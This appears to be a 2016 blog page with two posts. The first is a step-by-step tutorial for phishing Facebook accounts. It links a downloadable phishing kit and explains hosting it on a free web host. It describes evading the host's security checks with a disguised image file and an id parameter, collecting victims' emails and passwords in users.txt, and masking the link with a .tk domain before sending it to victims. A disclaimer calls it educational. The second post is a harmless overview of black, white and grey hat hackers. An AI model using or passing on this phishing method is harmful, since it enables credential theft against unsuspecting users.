Thursday 24 March 2016

PHISHING (A Hacking Trick) :-


Phishing is the attempt to acquire sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money), often for malicious reasons, by masquerading as a trustworthy entity in an electronic communication.

It can be used to hack different social media sites / accounts such as Facebook id,Gmail id etc...

Here I'll Explain how to hack Facebook account using Phishing . It's only for learning purpose and not for any misuse friends.

Phishing Facebook :-








Warning & Disclaimer: Making a phishing page is not illegal, but using a phishing page is illegal. This tutorial is just to show you, "How to create phishing page?". If you use this to hack anyone account, then I AM not responsible for it. Do anything on your own risk.

Features 

  • No suspension (From free web host)
  • Undetectable (Security check bypassed)
  • Responsive (It will work with Mobile And Desktop)
  • Url Mask (Hiding or changing phisher url)

    I have sorted this tutorial as 4 steps:

  1. Download the Attachment file, Link: http://www.mediafire.com/download/nwme10u66qwmgoq/responsive-facebook.zip
  2. Sign up to Free web host and upload the files
  3. URL masking/hiding
  4. Responsive Demonstration 


Step 1: Download the Attachment file

First of all download the attachment file named 'responsive-facebook.zip' file from http://www.mediafire.com/download/nwme10u66qwmgoq/responsive-facebook.zip.

There will be 9 files inside the zip (data.php, data1.php, index.php, Mobile_Detect.php, desktop.jpg, follow.jpg, login.jpg, desktop_files(folder), users.txt) 


Step 2: Sign up to Free web host and upload the files

I prefer 000.webhost.com.

Go to: https://members.000webhost.com/signup  and fill out the information needed and click on Create My Account.

Open your email and verify the account you will see the active domain in your account ,then  click on Go to CPanel.

Now open the first file manager icon under File managers section.

Open up  “public_html” folder and delete the 2 files inside it. then click on “upload
    • Below “Archive” section on the right side click on “Choose file“, Select the downloaded zip file step 1(responsive-facebook.zip)


Click on the "Green Tick"

Done!!!, Now what will happen,when your hosting provider will test your content they will get a innocent php file reading another file.and when they try will to access "login.jpg" file they will get an invalid/corrupted image.

Important

Now Access your URL with this id at end (/?id=facebook), This Unique Url is important for bypassing security check and i set the default id as facebook for this tutorial.

Example: "www.autolikerfb.comxa.com/?id=facebook"

When victim enter the email and and password in above page will be stored in our 'users.txt' file, to see that click the view button next to users.txt file.

Finally you have your phisher link like this: www.autolikerfb.comxa.com/?id=facebook.

Step 3: Url Masking/Hiding

Now you have to hide the URL. That way it can be less suspicious. so here we use Dot TK url Shortening. your actual Phishing url can create a sense of doubt in victim's mind, we can hide the url. Dot.tk is an online service which enables you to hide/mask the url.

1. So, go to http://www.dot.tk/en/index.html?lang=en to hide url.

2. Select shorten URL then enter your phisher link in the textbox and hit on Next. (My Phisher link: 
www.autolikerfb.comxa.com/?id=facebook )

3. Enter the domain name you want to rename your phisher link 
(My domain: autolikerfb )

Now we have the phishing url shortened like belove:

www.autolikerfb.comxa.com/?id=facebook  =  autolikerfb.tk

Now, you can send this masked phisher link to your victim.

The victim will now find our phisher link less suspicious as we have hidden the actual phisher link using .tk domain.



Step 4: Responsive Demonstration 

Here is the screenshot of autoliker.tk in mobile view and desktop version and it will automatically redirect to original facebook page when click login. 





Saturday 19 March 2016

Introduction and Types

What Is Hacking?

Hacking is the practice of modifying the features of a system, in order to accomplish a goal outside of the creator's original purpose. The person who is consistently engaging in hacking activities, and has accepted hacking as a lifestyle and philosophy of their choice, is called a hacker.

Computer hacking is the most popular form of hacking nowadays, especially in the field of computer security, but hacking exists in many other forms, such as phone hacking, brain hacking, etc. and it's not limited to either of them.

Types Of Hackers :-

Basically,there are three types of Hackers:

1) Black Hat Hackers
2) White Hat Hackers
3) Grey Hat Hackers

Let's Go Through Detailed Understanding Of Each...

BLACK HAT HACKERS:-

Black Hat Hackers hold unethical intentions and break into computers or networks for their own taste. Black hat hackers are also known as crackers. These types of hackers continuously keep an eye on victim computer’s vulnerability, as soon as they find it, they break into it for malicious intentions. These types of hackers are engaged in almost all types of cyber crimes, such as ID theft, money stealing from Credit Cards, piracy of paid content and so on. They can use malicious websites and malicious soft-wares (worms) to start their journey in victim’s network.



WHITE HAT HACKERS:-

White hat hackers are people who hack into systems or networks for betterment of their computers. They don’t do it with unethical intentions, instead they do it so that they can know the way other hackers can do, and then they fix the security hole, if there is any. White hat hackers are mostly security experts. They are usually hired by companies to test the company’s computers security. Bounty Hunters and Penetration testers are other names of White Hat hackers.



GREY HAT HACKERS:-

Grey Hat hackers have both White hat and Black hat hacker’s habits. They surf the internet and look for a vulnerable computer system, network or phone system. Once they find one, they hack into it and inform the administrator what or how they have done it. They usually charge a small fee to fix the vulnerability. That’s why they are White Hat hackers too. But they do it all without any permission from owner of website, computer or network, this way they are black hat hackers.